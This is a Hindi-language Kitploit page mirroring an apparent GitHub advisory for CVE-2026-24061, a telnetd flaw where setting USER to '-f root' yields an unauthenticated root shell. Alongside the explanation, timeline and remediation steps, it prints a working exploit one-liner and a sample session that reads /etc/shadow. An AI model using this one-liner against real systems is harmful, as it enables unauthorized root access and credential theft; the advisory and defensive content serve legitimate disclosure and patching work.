Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061 — CVE-2026-24061 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2026-24061
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHub0xblackash/cve-2026-24061

CVE-2026-24061

CVE-2026-24061

रिपॉजिटरी देखें
1422 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2026-24061 — “TelneTD”

ChatGPT छवि 25 जून, 2026, 03_03_25 PM

GNU Inetutils telnetd में गंभीर रिमोट प्रमाणीकरण उल्लंघन
2015 का भूत अब भी उन सबको अपने कब्जे में लेने के लिए लौट आया है जो अब भी टेलनेट चला रहे हैं।

CVSS Badge Status Badge KEV Badge Type Badge

शून्य प्रमाणीकरण। एक एनवायरनमेंट वेरिएबल। तुरंत रूट शेल।


⚠️ अवलोकन

CVE-2026-24061 GNU Inetutils telnetd ≤ 2.7 में एक गंभीर रिमोट विशेषाधिकार वृद्धि भेद्यता है।

एक अप्रमाणित रिमोट हमलावर Telnet NEW-ENVIRON विकल्प के माध्यम से USER एनवायरनमेंट वेरिएबल को "-f root" पर सेट करता है।
telnetd इसे अनसैनिटाइज्ड सीधे /bin/login को भेजता है → login -f root देखता है → सभी प्रमाणीकरण छोड़ता है → हमलावर को रूट शेल में पहुंचा देता है।

यह खतरनाक कोड लगभग 11 वर्षों (लगभग 2015 से) तक ट्री में चुपचाप पड़ा रहा।

“एक env var. कोई पासवर्ड नहीं. पूर्ण रूट. 2026 में आपका स्वागत है।”


🔥 गंभीरता और प्रभाव

  • CVSS v3.1 आधार स्कोर: 9.8 / गंभीर
    AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
  • हमला वेक्टर: नेटवर्क (TCP/23)
  • आवश्यक विशेषाधिकार: कोई नहीं
  • उपयोगकर्ता इंटरैक्शन: कोई नहीं
  • शोषण परिपक्वता: तुच्छ (एक-लाइनर किसी भी टेलनेट क्लाइंट से काम करता है)

मार्च 2026 में वास्तविकता:

  • जनवरी के अंत से बड़े पैमाने पर स्कैनिंग और शोषण देखा गया
  • लीगेसी एम्बेडेड डिवाइस, OT गियर, भूल गए टेस्ट सर्वर अब भी खुले हैं
  • पूर्ण सिस्टम समझौता: क्रेडेंशियल, स्थिरता, रैनसमवेयर प्रवेश बिंदु

🕵️ खोज

  • जनवरी 2026 के मध्य में GNU अनुरक्षकों को निजी तौर पर रिपोर्ट किया गया
  • जनवरी 2026 के अंत में oss-security के माध्यम से सार्वजनिक रूप से खुलासा किया गया
  • GNU Inetutils ≥ 2.8 में ठीक किया गया (खुलासा के तुरंत बाद जारी किया गया)

🔬 तकनीकी गहराई

जब telnetd को NEW-ENVIRON विकल्प प्राप्त होता है जिसमें शामिल है:

root@kitploit:~
USER=-f root

यह मान को सीधे /bin/login को पारित argv में जोड़ता है:

root@kitploit:~
execve("/bin/login", ["login", "-f", "root", ...], ...)

login बाइनरी -f root को इस प्रकार व्याख्या करता है:
“यह उपयोगकर्ता पहले से ही root के रूप में प्रमाणित है — कोई पासवर्ड जांच की आवश्यकता नहीं।”

→ हमलावर को # प्रॉम्प्ट मिलता है। खेल खत्म।

प्रमुख घातक डिजाइन विकल्प: -R / env var फॉरवर्डिंग को कभी भी अधिकृत उपयोगकर्ताओं तक सीमित नहीं किया गया।


📅 समयरेखा


🖥️ प्रभावित सिस्टम

संवेदनशील संस्करण: GNU Inetutils telnetd 1.9.3 – 2.7
2026 में सामान्य लक्ष्य:

  • लीगेसी औद्योगिक नियंत्रक और HMI
  • पुराने राउटर, स्विच, प्रिंटर
  • Debian-व्युत्पन्न एम्बेडेड उपकरण
  • भूल गए देव/परीक्षण VM और कंटेनर
  • OT गेटवे जो अब भी TCP/23 को उजागर कर रहे हैं

सुरक्षित:

  • busybox telnetd चलाने वाले सिस्टम
  • Inetutils ≥ 2.8
  • टेलनेट पूरी तरह से अक्षम / फ़ायरवॉल किया गया

💥 कार्रवाई में शोषण

एक-लाइनर (कोई भी Linux/macOS जिसमें टेलनेट क्लाइंट हो):

root@kitploit:~
USER="-f root" telnet -a 192.168.1.50

सामान्य आउटपुट:

telned
root@kitploit:~
┌──(attacker㉿kali)-[~]
└─$ USER="-f root" telnet -a 192.168.1.50
Trying 192.168.1.50...
Connected to 192.168.1.50.
Escape character is '^]'.

Debian GNU/Linux 12 telnetd

root@legacy-box:~# whoami
root
root@legacy-box:~# id
uid=0(root) gid=0(root) groups=0(root)
root@legacy-box:~# cat /etc/shadow
...

एक Enter कुंजी दबाने के बाद — पूर्ण रूट एक्सेस।


🛡️ जाँच और उपचार (मार्च 2026)

1. संवेदनशील सेवा का पता लगाएं

root@kitploit:~
telnet localhost 23   # inetutils बैनर देखें
inetutils-telnetd --version   # यदि ≤ 2.7 है तो संवेदनशील

2. इसे मारें (हमेशा के लिए पसंदीदा)

root@kitploit:~
systemctl disable --now inetutils-inetd   # या telnet.socket
pkill telnetd && chmod -x /usr/sbin/telnetd

3. अपडेट करें (केवल यदि आपको telnet रखना ही है — दुर्लभ)

root@kitploit:~
sudo apt update && sudo apt install --reinstall inetutils-telnetd   # → ≥2.8

4. फ़ायरवॉल (बेल्ट और सस्पेंडर्स)

root@kitploit:~
iptables -A INPUT -p tcp --dport 23 -j DROP
ufw deny 23/tcp

📈 स्थिति — मार्च 2026

  • अपैचित लीगेसी उपकरणों के खिलाफ शोषण जारी है
  • टेलनेट का उपयोग अब तक के सबसे निचले स्तर पर — लेकिन मौजूद होने पर अब भी घातक
  • पारिस्थितिकी तंत्र का निष्कर्ष: लीगेसी प्रोटोकॉल बारूदी सुरंग हैं

🎓 पत्थर पर खुदे सबक

  • 11 साल पुराने बग अब भी "मृत" कोड में छिपे हैं
  • रूट-उत्पन्न करने वाले बाइनरीज को कभी भी अनसैनिटाइज्ड उपयोगकर्ता इनपुट न दें
  • आर्गुमेंट इंजेक्शन → रूट कालातीत है
  • टेलनेट को 2010 में ही मर जाना चाहिए था। 2026 में इसे मार डालो।
टूल डाउनलोड करें
दिनांकघटना
~मार्च 2015संवेदनशील env हैंडलिंग प्रस्तुत की गई
जनवरी 2026अपस्ट्रीम को निजी रिपोर्ट
जनवरी 2026 के अंतसार्वजनिक खुलासा और CVE असाइनमेंट
जनवरी 2026 के अंतफिक्स जारी (Inetutils ≥ 2.8)
26 जनवरी, 2026CISA ज्ञात शोषित भेद्यता सूची में जोड़ा गया
फरवरी–मार्च 2026लीगेसी/OT सिस्टमों के खिलाफ शोषण में वृद्धि
मार्च 2026कई एम्बेडेड विक्रेता अब भी चुप या अपैचित